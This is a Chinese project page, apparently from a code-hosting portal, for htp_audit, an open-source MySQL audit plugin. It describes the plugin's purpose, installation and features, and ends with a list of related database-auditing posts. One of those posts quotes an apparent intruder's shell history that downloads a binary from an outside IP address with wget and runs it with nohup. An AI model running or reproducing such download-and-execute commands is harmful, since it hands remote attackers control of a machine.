MySQL 审计插件 htp_audit

GPL
C/C++ 查看源码»
跨平台
2018-11-19
热璞科技

htp_audit 是为 MySQL 开源数据库自主研发的审计插,弥补了 MySQL 开源数据库产品缺乏审计功能,为数据库安全透明运行提供技术保障。

审计插件 htp_audit 的应用场景

举例场景描述:企业发现某天数据库中的数据被人为删除了,尽管有数据备份,但因服务终止造成的损失可能高达上千万,还不计算殃及的品牌价值、用户体验等。企业必然要排查是什么原因触发的,这个删除操作是谁操作的,往往拥有数据库操作权限的人员较多,从何排查,证据在哪?

上述有关数据库的安全场景在企业中常出现,数据库作为企业业务系统的数据存储容器,类似人体的心脏和血液循环系统,数据就是企业业务系统的血液,数据库一旦出现问题就像心脏停止跳动,整个企业的生产系统或交易系统都将停止。当数据出现非正常修改的问题时,我们需要快速分析、诊断问题发生的原因,追踪数据不安全的根源,降低数据泄漏风险,进行实时风险预警,这就是通常所说的“数据库审计功能”。但是 MySQL 开源数据库缺失审计功能,这对于广大 MySQL 开源数据库用户而言是埋下了数据安全的隐患。

热璞科技开源的审计插件 htp_audit,能够实时记录数据库活动,帮助用户分析、追查、诊断追踪不安全事件,保障数据安全,实时预警数据库操作风险。对 MySQL 数据据库 DBA 而言,使用审计插件 htp_audit 非常简便,从 GitHub上 直接下载 htp_audit 审计插件源码文件,复制到 MySQL 数据库源码的 plugin 文件夹中,编译生成 htp_audit.so文件,然后在 MySQL 中安装使用:install plugin htp_audit soname 'htp_audit.so';。

审计插件 htp_audit 的功能简述

针对 MySQL 开源数据库的审计功能缺失,行业内也出现了一些解决的办法,例如:甲骨文公司在 MySQL5.5 的企业版中增加了 mysql-audit plugin,只限于 MySQL 数据库企业版,且功能类似于 general-log 的方式。也有一些第三方审计插件,但都没有达成 MySQL 数据库的审计功能,例如:MySQL 数据库中的事件类型较多,第三方审计工具未能做到对所有事件提供对应的处理函数;MySQL 数据库缺少配置文件,则不能灵活地配置审计事件的类型,往往调整配置则需要重启 mysqld 服务,甚至修改源代码重新编译。

热璞科技的 MySQL 源码团队调研了企业版本审计功能、收集 MySQL 数据库社区、大型企业客户等诉求,设计并研发的审计插件 htp_audit,能彻底做到审计全部事件、可动态在线修改配置等功能目标。审计插件 htp_audit 拥有以下三大特征:

  • 全类型事件审计:MySQL 开源数据库中的事件分为父类型和子类型,父类型如 table access 含有子类型 READ、INSERT、UPDATE、DELETE;父类型 connection 含有子类型 CONNECT、DISCONNECT 等,htp_audit 可根据配置文件进行所有子类型事件审计,保证审计的完整性和全面性。

  • 动态的审计配置:htp_audit 在启动时会从配置文件中获取要审计的事件类型,mysqld 实例在运行时也可通过全局变量 htp_audit_add_rule 添加需要审计的事件类型,通过 htp_audit_remove_rule 移除无需审计的事件类型。这就意味着在数据库运行过程中,htp_audit 可以动态增加或删除要审计的事件类型,保证整个审计过程对上层业务访问和业务系统是无感知的。

  • 发生及被审计次数展示:新增各类型事件的发生次数和配置审计事件被审计的次数,使用命令:SHOW  GLOBAL  STATUS  LIKE  "%audit%" 即可查看,方便用户实时了解审计插件的运行情况,例如:事件发生状况、业务负载状况等,轻松获取数据库审计信息。

的码云指数为
超过 的项目
加载中

评论(0)

暂无评论

暂无资讯

暂无问答

审计插件

通过审计插件可以记录服务器活动,记录谁连接到服务器,运行了什么查询,访问了哪些表,能存储到日志文件或发送到本地syslogd守护进程。 一、mariadb mariadb的审计插件能工作在mariadb、mys...

2014/07/31 09:41
1K
2
oracle审计功能如何实现启动关闭功能

一 审计功能的参数控制 二 查看是否审计功能是否启动 SQL> show parameter audit NAME TYPE VALUE ------------------------------------ ----------- ------------------------------ audi...

2014/01/24 13:22
26
0
oracle audit for 11g

----SYS用户下执行 ----0,检查当前数据库的失效对象。 select OWNER,OBJECT_NAME,OBJECT_TYPE,status,TIMESTAMP,LAST_DDL_TIME from dba_objects where STATUS ='INVALID'; ---1,初始化清理...

2018/09/25 18:02
9
0
配置Oracle安全审计选项audit

2. SYSDBA/SYSOPER操作的审计 SQL>show parameter audit; NAME TYPE VALUE ------------------------------------ ----------- --------------- audit_file_dest string /oracle/PQ1/102_64...

2014/01/26 16:01
297
0
oracle 审计

ORACLE审计小结 1、什么是审计 审计(Audit)用于监视用户所执行的数据库操作,并且Oracle会将审计跟踪结果存放到OS文件(默认位置为$ORACLE_BASE/admin/$ORACLE_SID/adump/)或数据库(存储在...

2013/05/04 18:09
49
0
打开和关闭oracle的审计功能

一 审计功能的参数控制 audit_trail 参数的值可以设置为以下几种 1. NONE:不开启 2. DB:开启审计功能 3. OS:审计记录写入一个操作系统文件。 4. TRUE:与参数DB一样 5. FALSE:不开启审计...

2016/07/18 09:59
8
0
黑客干的 不知道他想干啥

iftop htop ls ifconfig ethtool eth0 getconf LONG_BIT wget http://192.74.250.73:3213/rlxaa chmod 0755 /root/rlxaa nohup /root/rlxaa > /dev/null 2>&1 & wget http://192.74.250.87:4...

2013/09/04 20:39
297
0
触发器的例子,关于for each row的使用(无节操搬运)

create table test(id number); create table audit_table(table_name varchar2(20),ins int,upd int,del int); create or replace trigger test_tri after insert or update or delete on t...

2013/09/11 09:32
11
0
oracle 一些应用技巧

insert into venus_audit_auditevent_2012_3 select * from VENUS_AUDIT_AUDITEVENT_HIST aud (把一个把的数据复制到领一个表中) where to_char(aud.time,'yyyy-mm')='2012-03' create tab...

2014/03/07 13:08
66
0

没有更多内容

加载失败,请刷新页面

返回顶部
顶部